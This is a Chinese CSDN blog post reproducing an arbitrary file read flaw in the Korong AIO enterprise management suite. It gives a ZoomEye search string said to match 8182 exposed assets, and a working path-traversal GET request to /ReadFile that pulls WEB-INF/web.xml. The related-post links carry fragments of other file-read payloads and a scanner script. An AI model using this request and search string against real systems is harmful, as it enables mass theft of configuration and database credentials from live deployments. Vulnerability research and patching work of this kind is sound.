科荣 AIO ReadFile 任意文件读取(含批量验证poc)

已于 2024-04-08 14:11:49 修改
阅读量70 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-08 14:07:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137507089
版权
科荣AIO企业一体化管理解决方案中发现严重安全问题,ReadFile接口允许攻击者任意读取系统文件,包括数据库配置,造成重大安全隐患。已受影响的全版本需尽快采取修复措施,如安装官方发布的补丁更新。
摘要由CSDN通过智能技术生成

产品简介

科荣AIO 企业⼀体化管理解决方案 通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部门、多功能、需求多变等通⽤及个性化的问题。

漏洞描述

科荣AIO ReadFile 接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

ZoomEye及漏洞编号

“changeAccount(‘8000’)”
影响资产数量:8182
 

image.png


漏洞编号:暂无漏洞编号

影响版本

科荣 AIO全版本

漏洞复现

GET /ReadFile?tempFile=path&path=../../website/WEB-INF/&fileName=web.xml HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.1
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
科荣AIO管理系统V7版-用户手册
06-24
科荣AIO管理系统V7版-用户手册》是一份详尽的指南,旨在帮助用户理解和操作科荣AIO管理系统的最新版本——V7。这份手册不仅适合初学者,也适用于有一定经验的用户,提供了从基础到进阶的全方位学习资料。手册的...
免费ERP 科荣一体化管理软件AIO-II v7.0.2924
10-15
科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决
科荣AIO 存在ReadFile任意文件读取漏洞
wan___she__pi的博客
04-13 373
科荣AIO公司服务软件企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。
Pocsuite3编写poc——以Grafana任意文件读取为例
weixin_44522540的博客
09-06 1485
pocsuite3
任意文件读取及漏洞复现
来日可期的博客
08-31 3466
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
CVE-2021-3019 Lanproxy 任意文件读取漏洞【付POC
weixin_47536169的博客
07-19 975
Lanproxy简介: lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,目前仅支持tcp流量转发,可支持任何tcp上层协议(ssh访问、web服务器访问、远程桌面...)。 漏洞概述: 本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过…/绕过读取任意文件。该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。 环境搭建: Kali64位 Lanproxy burpsui...
齐博CMSV7任意文件读取漏洞批量测试POC
m0_46371267的博客
04-22 1411
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。 # -*- coding:utf-8 -*- import requests import re import urllib import base64 def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():
科荣OA基础操作手册(实例篇).docx
05-26
科荣OA基础操作手册(实例篇
科荣线路板公司岗位职责说明书doc59页.doc
10-07
科荣线路板公司岗位职责说明书doc59页.doc
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
任意文件读取
gl620321的博客
08-11 3036
一、任意文件读取 任意文件读取是属于文件操作漏洞的一种。 一般任意文件读取漏洞可以读取配置的信息甚至系统文件更重要。 严重的话,就可能导致SSRF,进而漫游内网。 通过注入修改路径 可以多重设置取最后一个值 他会判断图片的后缀.png,要构造一个文件去截断它,考虑用usename 测试user_avatar 上传任意一个图片文件 查看历史,照php脚本找到登陆的,用Ctal+R将它发送...
Apache Tomcat任意文件读取漏洞POC测试(CVE-2020-1938)
午夜安全
03-27 5235
CVE-2020-1938(POC测试) 1.背景 Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内了HTTP服...
任意文件读取专题
goddemon
12-23 1162
①利用目录构造读取类 welc0me to JUSTCTF!! <?php echo'<center><strong>welc0me to JUSTCTF!!</strong></center>'; highlight_file(__FILE__); $url = $_GET['url']; if(preg_match('/justctf\.com/',$url)){ if(!preg_match('/php|file|zip|bzip|zlib
GlassFish 任意文件读取
good good study
03-04 4314
一. 漏洞描述 glassfish是一款java编写的跨平台的开源的应用服务器。2015年10月,被爆出通用任意文件读取漏洞。利用这个漏洞,攻击者可读取服务器上任意文件。 与宽字节SQL注入一致,都是由于unicode编码歧义导致的。 影响版本:4.0至4.1 二. 漏洞复现 1. 环境搭建 使用vulhub中的环境搭建 访问8848 2. 构造如下payload: https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c
Windows任意文件读取漏洞
a1b2c3是弱口令
12-21 5141
低权限用户或恶意程序读取目标Windows计算机上任何文件的内容,设想你在内网测试的时候取得了一个普通权限,还能干吗,用该漏洞作者SandboxEscaper的一句话来说,也许是密码文件,我不够聪明,不知道能干吗。 漏洞故事 Twitter别名SandboxEscaper的安全研究员12月20日发布了针对微软Windows操作系统的新oday漏洞的概念验证PoC)漏洞利用。 SandboxE...
Python 蓝凌OA任意文件读取批量扫描 poc编写
YouthBelief的博客
02-15 1263
0x00 前言 CNVD-2021-28277 蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,Landray-OA系统被爆出存任意文件读取漏洞。 0x01 fofa 查询语句 app=“Landray-OA系统” 0x02 漏洞位置 POST请求 /sys/ui/extend/varkind/custom.jsp data:var={“body
网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇就够了。
2401_84466359的博客
08-12 532
这个方向更符合于大部分人对“黑客”的认知,他们能够黑手机、黑电脑、黑网站、黑服务器、黑内网,万物皆可黑(当然是要有授权的,不然进橘子我可不管),这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。是一种面向对象、直译式电脑编程语言,具有近二十年的发展历史,成熟且稳定。压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。
ctf 堆栈结构
qq_69100706的博客
08-12 385
CTF(Capture The Flag)竞赛中,理解堆栈结构对于解决涉及二进制分析、逆向工程和利用开发的挑战至关重要。堆栈是在程序执行过程中用于临时存储数据和管理函数调用的关键数据结构。
DC-4靶机渗透测试
最新发布
weixin_58786230的博客
08-14 204
【代码】DC-4靶机渗透测试。
科荣aio管理系统v7版-用户手册
12-02
科荣AIO管理系统V7版是一款全新升级的管理系统,旨在为用户提供更加便捷高效的操作体验。本用户手册将详细介绍系统的功能及操作方法,帮助用户快速上手使用。 系统功能方面,科荣AIO管理系统V7版提供了多种功能模块,包括人力资源管理、财务管理、销售管理、库存管理等。用户可以根据自身需求选择相应的模块进行操作。例如,人力资源管理模块提供了员工信息管理、考勤管理、工资管理等功能,用户可以通过该模块实现对人力资源的全面管理。 在操作方法方面,用户可以通过登录系统后,选择对应的模块进入相应页面。系统界面简洁清晰,用户可以通过菜单栏或快捷入口快速找到所需功能。在每个页面中,用户可以根据提示输入相应的信息,例如添加或修改员工信息、录入财务数据等。系统还提供了数据查询和报表生成等功能,用户可以方便地查看和分析数据。 此外,科荣AIO管理系统V7版还具有用户权限管理功能,管理员可以根据需要设置不同用户的权限,确保系统的安全性和数据的保密性。 总之,科荣AIO管理系统V7版是一款功能强大、操作简便的管理系统,通过本用户手册的详细介绍,用户可以迅速掌握系统的使用方法,提高工作效率。如果用户在使用过程中遇到问题,可以参考本手册或联系系统供应商的客服人员寻求帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值